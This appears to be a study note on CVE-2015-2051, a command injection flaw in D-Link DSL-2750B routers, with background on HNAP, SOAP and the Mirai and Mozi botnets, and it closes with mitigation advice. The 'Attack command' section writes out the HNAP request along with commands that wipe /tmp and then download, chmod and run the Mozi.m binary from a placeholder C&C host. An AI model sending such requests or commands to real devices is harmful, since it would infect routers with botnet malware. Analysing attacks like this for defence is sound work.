D-Link DSL2750B Command Injection

(D-Link DSL2750B에 대한 Command Injection 공격 시도)

(CVE-2015-2051)

REFERENCE LINK-> DSL-2750B Wireless N300 ADSL2+ Modem Router | D-Link UK (dlink.com)

REFERENCE LINK-> D-Link - 나무위키 (namu.wiki)

----------------------------------------------------------------------------------------------------

- [Information] -

D link corporation : a Tiwanese company that makes network products.
(Wi-Fi router, switch, Hostspot device, webcam, etc)

It's established in 1986 by being named 'Datex Systems INC',

changed its name 'D-Link' in 1992.

started as a simple LAN card manufacturer company, now it sells pretty much all kind of network products including IoT product.

This maker is the one of the only one that keeps trying to
phase VPN Client function in normal consumer's Internet modem.
(ex: iptime products only focus on VPN Server function)
If you wanna find a Internet modem that has a VPN Client function under ₩50,000 charged,

It'll be really hard to find an alternative option except D-Link product.

(Short = 가성비 좋은 네트워크 제품)

Recently it looks like also trying to provide VPN Server function by updating their firmware update.

What is DSL -> Digital subscriber line

is a family of technologies that are used to transmit digital data over telephone lines.

In telecommunications marketing, the therm DSL is widely understood to mean asymmetric digital subscriber line, the most commonly installed DSL technology, for Internet access.

---------------------------------------------------------------------------------------------------

- [Attack command] -

HTTP REQUEST HEADER : POST /HNAP1/ HTTP/1.0#

HOST: ***.***.***.***:80

CONTENT-TYPE: TEXT/XML

CHARSET="UTF-8" <- Most well known unicode encoding type.

SOAPACTION: HxxP://PURENETWORKS.COM/HNAP1/

CD /TMP && RM -RF *

WGET HTTP://BAD_GUY:55717/MOZI.M CHMOD 777 /TMP/MOZI.M  /TMP/MOZI.M
                         (C&C)(example port)

When you check the command detected here,
it's interesting to see that the requested HTTP header is pretty simple. (POST / HNAP1)

when the code has been executed, the rest is meant to be done by 'SOAP ACTION'.

HNAP1 -> D-Link HNAP (Home Network Management Protocol)

                      (based on SOAP protocol.)

            HxxP://PURENETWORKS.COM/HNAP1/ <-by using this, attackers can bypass an authentication process,

                                                                                          and try denial-of service or backdoor attack.

SOAP (Simple Object Access Protocol)

->The protocol that sends XML based messages through computer network environment by HTTP, HTTPS, SMTP (the well known protocols).

can access to objects very easily.

This can be the basement of sending simple messages within Web service.

SOAP ACTION -> It isn't a 'real' URL.

                        The URL is part of the HTTP request that is being performed on the service address.

specifies which process or program is needed to be called when a request is sent by the service requester with relative path of the process/program.

When (for example) the function 'insert' is called,

this function is called against the 'service address',

https://demo1.service-now.com/incident.do?SOAP (You can find this URL in the last part of the WSDL).

The call itself is just a regular HTTP request,

and one of the HTTP headers within that request has the name "SOAPAction", with a value of "http://www.service-now.com/incident/insert".

This action is a way for the provider to route the request the appropriate way,

but has absolutely no bearing on the actual URL being used for the HTTP Request.

Some other providers do not use the Soap action at all, or use a relative path, instead of a full URL.

REFERENCE LINK-> Solved: Difference between SOAP action and SOAP endpoint - ServiceNow Community

[Type of Bot]

Mirai -> IoT Botnet Malware.

Mozi -> IoT Botnet Malware. (Variant of Mirai)

The source code has actually been publicly opened so hackers can freely use it for attacking.

It is specialised for attacking pretty much all IoT devices that use Linux system inside, like Wi-Fi routers, CCTV, printers etc, it infects servers or devices and
turn them into a Zombie PC or device.

REFERENCE LINK-> [시사용어] 알고가자 2022 최신용어 (모지봇넷/ DAO/ 라스트룩/ 누산타라/ 오피스프리/ E플레이션/ 플럼북) (jobkorea.co.kr)

REFERENCE LINK-> 여전히 활개치는 IoT 악성코드 'Mozi'…유포지 30% ↑ (inews24.com)

When these Zombie PC are being gathered enough to be used
as the one of the proper 'corp',     ---------------> It's being called as 'Botnet'.

---------------------------------------------------------------------------------------------------

- [Solution] -

- when use DLink DSL2750B, update firmware to latest version.

- change passwords to complex one.

(According to the researcher of PaloAlto, it's very common that victim from this vulnerability, has been found to use very simple passwords, or even a default one.)